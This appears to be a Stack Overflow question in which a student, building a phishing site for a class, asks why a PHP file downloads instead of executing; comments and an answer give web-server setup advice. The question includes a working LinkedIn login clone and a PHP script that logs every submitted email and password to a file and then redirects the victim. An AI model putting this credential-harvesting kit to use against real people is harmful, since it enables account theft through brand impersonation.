0

For a class I have to create a phishing site that runs on a VM. I am currently working on my PC and running the site as an HTML.

I changed the "form action=" "... to form action="process.php"...

The html file works fine when I use an address or another html file in the action="xyz" instead, but will download the .php file instead of running it.

Long story short: My HTMl file will download the php file instead of running it

HTML Snippet:
action = "process.php" is on line 1

<form action="process.php" method="GET" name="login" novalidate="novalidate" id="login"  data-jsenabled="check" data-autologin="true" data-existingmembersignin="true">


 
 
 
 <input type="hidden" name="isJsEnabled" value="false"/>
 <input type="hidden" name="source_app" value=""/>
 <input type="hidden" name="tryCount" id="tryCount" value=""/>
 <input type="hidden" name="clickedSuggestion" id="clickedSuggestion" value="false" />

 <fieldset class="field-container field-container--fixed">
 

 <legend>Sign in to LinkedIn</legend>
 <div class="outer-wrapper">
 <div class="inner-wrapper">
 <div class="logo_container">LinkedIn</div>
 <ul class="form-fields" id="mini-profile--js">
 <li class="form-email ">
 <div class="fieldgroup hide-label">
 <label for="session_key-login" >Email address</label>
 <span class="error" id="session_key-login-error"></span>
 <input type="text" name="session_key" value="" id="session_key-login" placeholder="Email address" aria-describedby="session_key-login-error">
 <div class="domain-suggestion hide" id="domainSuggestion">
 <span>Did you mean:  <a id="suggestion" href="javascript:void(0);"></a>?</span>
 </div>
 </div>
 </li>

 <li class="form-password">
 <div class="fieldgroup hide-label">
 <label for="session_password-login" >Password</label>
 <span class="error" id="session_password-login-error"></span>
 <div class="password_wrapper">
 <input type="password" id="session_password-login" class="password" name="session_password" placeholder="Password" aria-describedby="session_password-login-error"/>
 </div>
 </div>
 </li>
 <li class="button form-actions">
 <div class="form-buttons">
 <input type="submit" name="signin" value="Sign In" class="btn-primary" id="btn-primary">
 </div>
 <div class="forgot-password-container">
 <a data-li-tooltip-id="login-tooltip"
 href="/uas/request-password-reset?session_redirect=&amp;trk=uas-login-forgot-password-text"
 tracking="uas-login-forgot-password-text" title="Forgot password?">Forgot password?</a>
 </div>
 <span>Not a member? <a href="/start/join?source=hb_signin&amp;trk=login_iframe_hb_signin">Join now</a></span>
 </li>
 </ul>
 </div>
 <div class="gaussian-blur"></div>
 </div>
<?php
header ('Location: http://racket-lang.org');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Edit: formatting to make it look better

Jake
  • 89
  • 1
  • 7
  • It sounds like either Apache is configured incorrectly or the PHP module isn't installed. On top of that, your PHP won't work; setting `header('Location:')` will redirect the user before the output is logged. – Obsidian Age Feb 28 '18 at 20:47
  • 2
    Possible duplicate of [Apache is downloading php files instead of displaying them](https://stackoverflow.com/questions/18422140/apache-is-downloading-php-files-instead-of-displaying-them) – showdev Feb 28 '18 at 20:47
  • @ObsidianAge You can set the `header` location before other php processing code. `header` does not act like an `exit` or `die`. But generally I try to set it as low down the chain as possible anyhow... never the first line of a php ;) – IncredibleHat Feb 28 '18 at 20:51
  • Does this apply even though I am running the HTML locally and not on a server? – Jake Feb 28 '18 at 20:56
  • Possibly even more so. See [PHP server on local machine?](https://stackoverflow.com/questions/1678010/php-server-on-local-machine) – showdev Feb 28 '18 at 20:59
  • Broadly speaking, PHP files only run as PHP code when accessed on a web server. If you're just linking to a local file, you'll get the raw file. – Stephen R Feb 28 '18 at 21:01
  • Hmm... I put the site on a server hosted on my VM, and now I'm getting a 403 forbidden error – Jake Feb 28 '18 at 21:40
  • Im using lighttpd btw – Jake Feb 28 '18 at 22:40
  • Configuring lighthttpd can be difficult i would suggest better use php's inbuilt server for demo purpose.locate the directory where php.exe is located open cmd there and run `php -S localhost:8080` paste your html and php files in same directory and it's done – Vinay Mar 02 '18 at 04:11

1 Answers1

0

If you are running on a local server like XAMPP, make sure you are opening the html file in the browser to the localhost address (ie. on the local server), not just to the folder and file in your file system (such as your C: drive).

Kristin
  • 1